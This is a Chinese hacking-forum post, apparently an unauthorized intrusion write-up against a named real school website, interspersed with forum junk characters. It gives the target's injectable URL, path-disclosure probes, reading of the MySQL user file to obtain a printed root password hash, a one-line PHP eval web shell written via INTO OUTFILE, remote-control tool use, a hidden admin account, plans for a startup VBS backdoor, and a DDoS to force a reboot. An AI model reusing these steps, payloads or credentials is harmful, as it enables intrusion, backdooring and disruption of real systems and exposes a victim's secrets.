友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
: A  r5 T9 s* |  q* e; f发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
# n9 M& c& I  t9 v" S
6 r5 b8 m4 @# k( v2 ?+ \
- F7 v" V8 m  c/ N" d* s( C" N7 x' U
" ^8 Q7 O" O: B- G3 `* p常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
- ~- m1 V- [" V$ O# N8 m6 {
$ @3 d; B2 n, G6 @1 s2 ]那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

! u2 J$ C# i+ ~* N8 y2 k, h试着爆绝对路径：
7 q6 A. H/ g) W- V* ~1./phpMyAdmin/index.php?lang[]=1  
8 g4 v" q4 t$ Y) D! t* [2./phpMyAdmin/phpinfo.php  
4 q2 C7 B3 i" U# s3 n3./load_file()  
- B" V. l9 B, x& l5 p4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
. p4 u! R7 w) r5 |  W' _, X  \5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
) R7 m2 c+ Y) C* l5 m9 C2 B$ Z7./phpmyadmin/libraries/mcrypt.lib.php   
' W: }6 N2 E# e  N* Z* D8./phpmyadmin/libraries/export/xls.php  

9 r7 F. M$ e! f均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

8 w# \* c3 T7 o默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
- z7 q5 K& T7 i! m# `) o: g
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

$ X) V% s. s3 T( z0 T, o/ _想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
) s( C% z& |! n0 M
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
! i/ @- _, D* L/ M* O8 U8 r' e
1 ?$ g+ F; V( X6 [( z6 w1 I. ]- S自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
. B* `1 v) m; D5 I* S
成功读到root密码：
3 o: ^  z' T( }. P# q4 ~
$ O/ n, T! ?( K9 I0 _- @17---- r(0072)
8 H. W5 c2 \% `3 J18---- o(006f)
19---- o(006f)
20---- t(0074)
8 h! k0 ~3 U$ J! N/ j+ B21---- *(002a)
22---- 8(0038)
1 U  `) U- s! H( p" d( k/ d  K23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
1 u, [% C# p# I' ~% t- p! q6 _27---- 5(0035)
0 |: M2 [/ P# d8 p" ]- l# A% W4 B28---- 8(0038)
: I. C* G( i5 l; ^# f6 Y3 e29---- 2(0032)
: r: Q. p, ]: Z$ Q$ D30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
1 C7 ?" `+ P5 k9 o; b34---- 5(0035)
35---- 4(0034)
0 v( L# ?) R' Z8 d1 z1 E+ m) C36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
$ Z: w8 y7 X3 H4 u39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
( y) R- {/ r, M+ V$ \, _43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
" j0 o4 h; P  Y2 w4 o1 `9 v) |/ L46---- 8(0038)
5 X! \; U9 R1 P& y4 k47---- F(0046)
48---- F(0046)
49---- 4(0034)
) `3 G  x3 w1 h$ c5 i* k! o5 n50---- F(0046)
: S+ V2 E! G2 o  u; K$ h; H1 [51---- 0(0030)
! c& D2 [# ~: e52---- 3(0033)
53---- 2(0032)
( |/ v. t6 Q. ?54---- A(0041)
55---- 4(0034)
' O1 {1 ^* ~( o9 f* p1 A1 ]7 Y56---- A(0041)
. k; X( R/ U3 Q7 C' d$ a; P! {  Q57---- B(0042)
3 L. s3 |6 j  I58---- *(0044)
7 P* B1 d3 X7 u2 b8 s. v59---- *(0035)
60---- *(0041)
61---- *0032)
: r0 q/ M. A! V: ~6 i; S! B9 q
# B0 O9 N! D( u解密后成功登陆phpmyamin
1 J. E# p& U8 [" z                          

                             
8 O6 j5 t6 ~0 a* D- A2 n
* h8 n) i' k9 p2 q+ L' w找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

; Y) z$ N6 W$ i成功执行，拿下shell，菜刀连接：

8 O' a* k4 @1 X/ }3 |3 r7 E. P& G服务器不支持asp,aspx,php提权无果...................
8 Q" S* ]7 W  L5 f* X0 l
* L2 E2 s3 Y& A1 `. x但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
  b8 l1 j3 A9 c: K! i( g- Q0 N) b

服务器上已经有个隐藏帐号了

- A6 d  O2 P) D4 j8 f

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

0 n  r5 F  @, E! q1 a. G5 d

成员

) ]; N" k; O$ b7 L

-------------------------------------------------------------------------------
4 C9 e+ ^/ S& S! W' D" Padmin
4 ]" ]$ N7 N8 H9 A0 rAdministrator
/ _2 V- }* R* _0 X# w( ?& t$ U5 t! |slipper$
+ q/ j, a7 @. X0 Y9 Y! Y; w" bsqluser
, E! \. ]8 u- U. M- k* r# s/ E  Z命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
: c& u$ L! Z' B+ G
ddos服务器重启，不然就只能坐等服务器重启了...............................
: i: g1 d2 G1 e- ]  p2 B( ?: e* U& P
" w9 D5 `9 r0 M      

angel